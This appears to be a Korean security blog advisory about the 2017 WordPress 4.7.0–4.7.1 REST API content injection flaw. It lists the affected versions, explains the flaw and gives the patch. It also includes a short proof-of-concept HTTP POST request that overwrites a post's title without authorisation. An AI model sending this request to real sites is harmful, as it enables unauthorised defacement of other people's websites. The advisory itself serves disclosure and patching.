상세 컨텐츠
본문
심각한 워드프레스 REST API 버그 발견!
최근 워드프레스에서 심각한 REST API 버그가 발견되었습니다. 해당 버그는 워드프레스의 REST API에 존재하며, 이를 통하여 원격 권한 상승과 컨텐츠 인젝션 버그를 유발할 수 있습니다.
영향받는 버전
워드프레스 4.7.0 - 4.7.1
취약점 내용
워드프레스 4.7.0버전 이후 REST API가 디폴트로 활성화 되도록 추가되었으며, 이 기능을 악용하면 승인되지 않은 해커가 방문자들을 악성 익스플로잇으로 이동시킬 수 있도록 허용합니다.
POC
POST /index.php/wp-json/wp/v2/posts/500?id=500a HTTP/1.1
Host: xxx.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36
Content-Type: application/json
Content-Length: 43
{"title":"xxxx"}
패치방법
워드프레스 4.7.2 로 업데이트
참고사이트
https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html
'국내외 보안동향' 카테고리의 다른 글
| WordPress 취약점 노리는 다수 공격 발견... 이미 수만 건의 피해 발생 (0) | 2017.02.08 |
|---|---|
| 안드로이드 랜섬웨어, 데스크탑 랜섬웨어의 기술 차용 (0) | 2017.02.08 |
| 윈도우 SMB 제로데이 익스플로잇, 마이크로소프트가 패치 진행하지 않아 공개돼 (0) | 2017.02.06 |
| 새로운 CryptoShield 랜섬웨어, ElTest 캠페인을 통해 배포 (0) | 2017.02.03 |
| 윈도우 7, 10 사용자를 대상으로 Netix 랜섬웨어를 퍼뜨리는 가짜 넷플릭스 앱 발견 (0) | 2017.02.02 |
댓글 영역